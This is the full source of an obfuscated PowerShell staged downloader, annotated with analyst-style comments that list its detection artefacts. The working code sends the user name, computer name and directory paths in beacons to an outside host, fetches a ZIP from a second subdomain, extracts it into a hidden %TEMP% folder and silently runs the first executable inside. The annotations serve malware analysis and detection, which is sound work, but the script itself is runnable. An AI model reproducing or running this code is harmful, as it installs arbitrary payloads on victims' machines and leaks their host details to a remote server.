# Staged downloader (PowerShell). Sequence visible in this script:
#   1. Send GET status beacons to https://testdomainffp.com/aurunlog at each stage.
#   2. Download https://booking.testdomainffp.com/summguponny.zip to
#      %TEMP%\kukyhjvj_yeas_aurun.zip.
#   3. Extract it into %TEMP%\sys_init_aurun_<8 chars> and mark that directory Hidden.
#   4. Start the first *.exe found under that directory with a hidden window.
# Status values sent in the 's' parameter: check_system_ok, download_ok,
# download_fail, unzip_ok, unzip_fail, run_ok, run_fail.
# Observable artefacts for detection and triage: the two hosts above, the
# /aurunlog query parameters (id, s, user, pc, cwd, noise, exe_name, msg), the
# fixed "Mozilla/5.0" User-Agent on the download, the ZIP and directory names
# under %TEMP%, and an executable started from that directory by the
# PowerShell process running this script.

# Status beacon: reports one stage result to the remote endpoint.
#   $event - stage/status label, sent as 's'
#   $note  - optional detail (error text or process id), sent as 'msg'
#   $path  - directory being reported, sent as 'cwd'
#   $file  - optional executable file name, sent as 'exe_name'
# Reads three script-level variables that are assigned after this definition
# but before the first call: the fixed id, the user name and the computer name.
function ril_qwepsx7u6lmowwf5rl651tw5k($event, $note="", $path="", $file="") {
    # Base URL: fixed host + /aurunlog, carrying the hard-coded id and the status label.
    $endpoint = 'https://testdomainffp.com' + '/aurunlog?id=' + $zqdbmgj4_fylgmapqk3yj2nin + '&s=' + $event
    # Host-identifying data leaves the machine here: user name ('user'),
    # computer name ('pc') and the reported directory ('cwd'), each URL-escaped.
    $queryParams = @(
        '&user=' + [System.Uri]::EscapeDataString($ztjhzmo_rsq_srwminbdreq3dbh53k0h),
        '&pc=' + [System.Uri]::EscapeDataString($gxyta2_lpqxkjsdk0_),
        '&cwd=' + [System.Uri]::EscapeDataString($path),
        # Random integer per request; presumably there to make each URL unique
        # (cache-busting or hindering exact-URL matching) - purpose not shown here.
        '&noise=' + (Get-Random -Minimum 5000 -Maximum 15000)
    )
    # Optional fields are appended only when a non-empty value was passed.
    if ($file -and $file -ne $null) {
        $queryParams += '&exe_name=' + [System.Uri]::EscapeDataString($file)
    }
    if ($note -and $note -ne $null) {
        $queryParams += '&msg=' + [System.Uri]::EscapeDataString($note)
    }
    $fullUri = $endpoint + ($queryParams -join '')
    try {
        # Response is discarded; the request itself is the signal to the server.
        $null = Invoke-WebRequest -Uri $fullUri -Method GET -UseBasicParsing -TimeoutSec 5
    } catch {
        # Empty on purpose: a failed beacon produces no error output and does
        # not interrupt the remaining stages.
    }
}

# Fixed identifier sent as 'id' with every beacon; presumably a campaign or
# build identifier - the script does not say what it denotes.
$zqdbmgj4_fylgmapqk3yj2nin = 'ff4ea9d9-bde9-4ce1-8153-b00c698e4192'
# Values reported as 'user' and 'pc'.
$ztjhzmo_rsq_srwminbdreq3dbh53k0h = $env:USERNAME
$gxyta2_lpqxkjsdk0_ = $env:COMPUTERNAME

# First beacon: sent before any download, with the TEMP path as 'cwd'.
& ril_qwepsx7u6lmowwf5rl651tw5k 'check_system_ok' '' $env:TEMP $null

# Loads the .NET ZIP API used for extraction further down.
Add-Type -AssemblyName System.IO.Compression.FileSystem

# Stage 2 inputs: archive URL and the fixed file name it is saved under in %TEMP%.
$eztynv_tqmhzj_mykkhlo_ddnsiakx4e = 'https://booking.testdomainffp.com/summguponny.zip'
$euhy4_pemzlt_wlqg8pxx = "$env:TEMP\kukyhjvj_yeas_aurun.zip"
# Download-success flag and last error text (reused by later stages).
$womtsck_ovpguf_swgr = $false
$ljcvqsbqf_fwalwpy3 = $null

# Restricts outbound HTTPS from this session to TLS 1.2 and TLS 1.3.
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 -bor [System.Net.SecurityProtocolType]::Tls13

try {
    # Hides the download progress display.
    $progressPreference = 'SilentlyContinue'
    # Archive fetch with a bare "Mozilla/5.0" User-Agent and a 30 s timeout.
    Invoke-WebRequest -Uri $eztynv_tqmhzj_mykkhlo_ddnsiakx4e -OutFile $euhy4_pemzlt_wlqg8pxx -UserAgent "Mozilla/5.0" -UseBasicParsing -TimeoutSec 30

    if (Test-Path $euhy4_pemzlt_wlqg8pxx) {
        $fileInfo = Get-Item $euhy4_pemzlt_wlqg8pxx
        # Only a file larger than 10240 bytes is accepted. No hash, signature or
        # content check is made: whatever the server returns above that size
        # is extracted and executed.
        if ($fileInfo.Length -gt 10240) {
            $womtsck_ovpguf_swgr = $true
            & ril_qwepsx7u6lmowwf5rl651tw5k 'download_ok' '' "$env:TEMP" $null
        } else {
            # Too small: delete the file, report "FileTooSmall" and stop.
            Remove-Item $euhy4_pemzlt_wlqg8pxx -Force
            $ljcvqsbqf_fwalwpy3 = "FileTooSmall"
            & ril_qwepsx7u6lmowwf5rl651tw5k 'download_fail' $ljcvqsbqf_fwalwpy3 "$env:TEMP" $null
            exit 1
        }
    }
} catch {
    # The local exception message is sent to the remote endpoint as 'msg'.
    $ljcvqsbqf_fwalwpy3 = $_.Exception.Message
    & ril_qwepsx7u6lmowwf5rl651tw5k 'download_fail' $ljcvqsbqf_fwalwpy3 "$env:TEMP" $null
    exit 1
}

# Covers the path where the request did not throw but no file was found on disk.
if (-not $womtsck_ovpguf_swgr) { exit 1 }

# Stage 3: extraction directory under %TEMP%, named sys_init_aurun_ plus the
# first eight characters of a new GUID, so the suffix differs on every run.
$lhmks_hhvvlra_brke = "$env:TEMP\sys_init_aurun_" + [System.Guid]::NewGuid().ToString().Substring(0,8)
$ljcvqsbqf_fwalwpy3 = $null

try {
    $null = New-Item -Path $lhmks_hhvvlra_brke -ItemType Directory -Force
    [System.IO.Compression.ZipFile]::ExtractToDirectory($euhy4_pemzlt_wlqg8pxx, $lhmks_hhvvlra_brke)

    # Unblocking files
    # (what the next statement does: clears the ReadOnly attribute bit on
    # every extracted file)
    Get-ChildItem $lhmks_hhvvlra_brke -Recurse -File | ForEach-Object { $_.Attributes = $_.Attributes -band (-bnot [IO.FileAttributes]::ReadOnly) }
    # Sets the directory's attributes to Hidden, so a default Explorer view
    # does not list it.
    Set-ItemProperty -Path $lhmks_hhvvlra_brke -Name Attributes -Value 'Hidden'

    & ril_qwepsx7u6lmowwf5rl651tw5k 'unzip_ok' $null $lhmks_hhvvlra_brke $null
    # The downloaded archive is deleted after extraction, so on a host where
    # this stage succeeded the ZIP is normally absent from %TEMP%.
    Remove-Item $euhy4_pemzlt_wlqg8pxx -Force -ErrorAction SilentlyContinue
} catch {
    $ljcvqsbqf_fwalwpy3 = $_.Exception.Message
    # On failure the partially created directory is removed before reporting;
    # the ZIP itself is not deleted on this path.
    if (Test-Path $lhmks_hhvvlra_brke) {
        Remove-Item $lhmks_hhvvlra_brke -Recurse -Force -ErrorAction SilentlyContinue
    }
    & ril_qwepsx7u6lmowwf5rl651tw5k 'unzip_fail' $ljcvqsbqf_fwalwpy3 $null $null
    exit 1
}

if (-not (Test-Path $lhmks_hhvvlra_brke)) { exit 1 }

# Stage 4: the payload is not named in the script; it is whichever *.exe the
# recursive listing returns first from the extracted archive.
$jny_prt_panbs_buticcnokmtj62 = Get-ChildItem -Path $lhmks_hhvvlra_brke -Filter "*.exe" -Recurse | Select-Object -First 1
if (-not $jny_prt_panbs_buticcnokmtj62) {
    & ril_qwepsx7u6lmowwf5rl651tw5k 'run_fail' 'No EXE found' $lhmks_hhvvlra_brke $null
    exit 1
}

# Full path, containing directory and file name of the selected executable.
$ltc_vijxbfszfanl4iptwtr9h6cjusr6ns = $jny_prt_panbs_buticcnokmtj62.FullName
$dhkk0_lgzedl_viexxbaq_uwoeg = Split-Path $ltc_vijxbfszfanl4iptwtr9h6cjusr6ns
$fmnncsb_vpx9_zcg4_les = Split-Path $ltc_vijxbfszfanl4iptwtr9h6cjusr6ns -Leaf

try {
    # Launches the executable with a hidden window from its own directory;
    # -PassThru returns the process object so its id can be reported.
    $proc = Start-Process -FilePath $ltc_vijxbfszfanl4iptwtr9h6cjusr6ns -WorkingDirectory $dhkk0_lgzedl_viexxbaq_uwoeg -WindowStyle Hidden -PassThru -ErrorAction Stop
    # Final beacon: the new process id goes out as 'msg', the directory as
    # 'cwd' and the file name as 'exe_name'.
    & ril_qwepsx7u6lmowwf5rl651tw5k 'run_ok' $proc.Id $dhkk0_lgzedl_viexxbaq_uwoeg $fmnncsb_vpx9_zcg4_les
} catch {
    # A failed launch is reported with the exception text; there is no exit
    # call on this path.
    & ril_qwepsx7u6lmowwf5rl651tw5k 'run_fail' $_.Exception.Message $dhkk0_lgzedl_viexxbaq_uwoeg $fmnncsb_vpx9_zcg4_les
}